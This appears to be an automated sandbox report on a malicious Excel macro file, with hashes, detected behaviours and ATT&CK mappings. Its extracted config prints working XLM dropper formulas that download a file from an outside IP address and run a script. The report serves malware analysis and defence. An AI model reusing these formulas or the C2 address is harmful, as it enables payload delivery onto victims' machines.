Overview

overview

10

Static

static

10

f4fe4bf4a2...8.xlsm

windows7-x64

10

f4fe4bf4a2...8.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    f4fe4bf4a27d26709bb68eefc5f44de3_JaffaCakes118

  • Size

    6KB

  • Sample

    240417-emqv1sdb97

  • MD5

    f4fe4bf4a27d26709bb68eefc5f44de3

  • SHA1

    34a428ccc83bf84ef1eb99fc7eb4c6b9d4d3a646

  • SHA256

    8ec39c3faf794bce6802cae9f6909624cfde1fa4a031485e62f523bb026fc9eb

  • SHA512

    18b27d804948173a9861c1b39c027fb93aa8020e5ba006dfe723dd801a7affa59eefe33aab48281e7964c9593c8fa67607a3a95a6f4319c1f240f50ee0c5bc7d

  • SSDEEP

    192:NDSouSmbrA2OmmfR18UhHFBFYuzb98ywFKg+f:NnufM2wD1FYib98ywFKJ

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php
Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php
xlm40.dropper

http://google.com/index.php

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

Targets

    • Target

      f4fe4bf4a27d26709bb68eefc5f44de3_JaffaCakes118

    • Size

      6KB

    • MD5

      f4fe4bf4a27d26709bb68eefc5f44de3

    • SHA1

      34a428ccc83bf84ef1eb99fc7eb4c6b9d4d3a646

    • SHA256

      8ec39c3faf794bce6802cae9f6909624cfde1fa4a031485e62f523bb026fc9eb

    • SHA512

      18b27d804948173a9861c1b39c027fb93aa8020e5ba006dfe723dd801a7affa59eefe33aab48281e7964c9593c8fa67607a3a95a6f4319c1f240f50ee0c5bc7d

    • SSDEEP

      192:NDSouSmbrA2OmmfR18UhHFBFYuzb98ywFKg+f:NnufM2wD1FYib98ywFKJ

    Score
    10/10

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Tasks